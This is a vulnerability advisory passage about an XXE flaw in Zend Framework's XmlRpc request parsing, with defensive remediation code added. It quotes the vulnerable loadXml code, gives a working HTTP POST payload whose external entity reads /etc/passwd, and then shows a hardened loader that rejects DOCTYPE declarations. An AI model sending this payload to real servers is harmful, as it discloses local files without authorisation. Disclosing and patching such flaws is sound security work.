Proof of concept:
-----------------

For example, the loadXml function (Zend\XmlRpc\Request.php and Response.php) fails to disable external entities when parsing XML data. There is no call to the libxml_disable_entity_loader function before initializing the SimpleXMLElement class.

Related code excerpt:

    public function loadXml($request)
    {
        if (!is_string($request)) {
            $this->_fault = new Zend_XmlRpc_Fault(635);
            $this->_fault->setEncoding($this->getEncoding());
            return false;
        }

        try {
            // Vulnerable: the raw request body is handed to SimpleXMLElement
            // without a preceding libxml_disable_entity_loader() call, so an
            // external entity declared in the document's DOCTYPE is resolved.
            $xml = new SimpleXMLElement($request);
        } catch (Exception $e) {
            // Not valid XML
            $this->_fault = new Zend_XmlRpc_Fault(631);
            $this->_fault->setEncoding($this->getEncoding());
            return false;
        }

        [...]
    }

If a web application uses the Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php) to handle XML-RPC requests, it is possible to disclose arbitrary local files from the remote system.

The following HTTP POST request to the vulnerable XML-RPC server application illustrates the exploitation of this vulnerability:

    POST /xmlrpc_server.php HTTP/1.1
    Host: $host

    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ELEMENT methodName ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <methodCall>
    <methodName>&xxe;</methodName>
    </methodCall>
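The advisory's point is that the request body reaches SimpleXMLElement with the libxml external entity loader still enabled. The following is an added example (written for this page, not Zend Framework's own patch) of how a loader can close that gap: it rejects any document carrying a DOCTYPE or entity declaration, since an XML-RPC methodCall never needs one, and it turns the entity loader off for the duration of the parse. The function name loadXmlSafely and the sample request strings are assumptions constructed for the example.

```php
<?php
// Added example, not Zend Framework code: a hardened variant of the
// loadXml() pattern discussed above.
//
// Returns the parsed document, or null when the input is rejected or malformed.
function loadXmlSafely(string $xml): ?SimpleXMLElement
{
    // An XML-RPC request has no legitimate use for a DOCTYPE, so refuse any
    // document that declares one (or declares entities) before parsing at all.
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        return null;
    }

    // Disable the external entity loader while we parse. PHP 8.0 deprecates
    // this call because the loader is already disabled by default there, so
    // only touch it on older interpreters.
    $previousLoaderState = null;
    if (PHP_VERSION_ID < 80000) {
        $previousLoaderState = libxml_disable_entity_loader(true);
    }
    $previousErrorMode = libxml_use_internal_errors(true);

    try {
        // LIBXML_NONET additionally forbids network access during parsing.
        $doc = new SimpleXMLElement($xml, LIBXML_NONET);
    } catch (Exception $e) {
        // Not well-formed XML.
        $doc = null;
    } finally {
        // Restore global libxml state so other code is not affected.
        libxml_use_internal_errors($previousErrorMode);
        if ($previousLoaderState !== null) {
            libxml_disable_entity_loader($previousLoaderState);
        }
    }

    return $doc;
}

// Constructed sample inputs for a stand-alone run.
$benignRequest = '<?xml version="1.0"?>'
    . '<methodCall><methodName>system.listMethods</methodName></methodCall>';

// Same shape as the advisory's PoC, but pointing at a harmless placeholder file.
$doctypeRequest = '<?xml version="1.0"?>'
    . '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///dev/null">]>'
    . '<methodCall><methodName>&xxe;</methodName></methodCall>';

$parsed = loadXmlSafely($benignRequest);
echo 'benign request -> methodName: ', (string) $parsed->methodName, PHP_EOL;

$rejected = loadXmlSafely($doctypeRequest);
echo 'DOCTYPE request -> ', ($rejected === null ? 'rejected' : 'accepted'), PHP_EOL;
```

The string check is the part that actually stops the PoC on every PHP version: even with the loader disabled, an inline (non-external) entity could still be expanded, and rejecting the DOCTYPE outright removes that whole class of input. Restoring the previous libxml state in the finally block matters in long-running or shared code paths, because both libxml_disable_entity_loader and libxml_use_internal_errors are process-global settings.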
Reference: http://seclists.org/bugtraq/2012/Jun/166 (1055)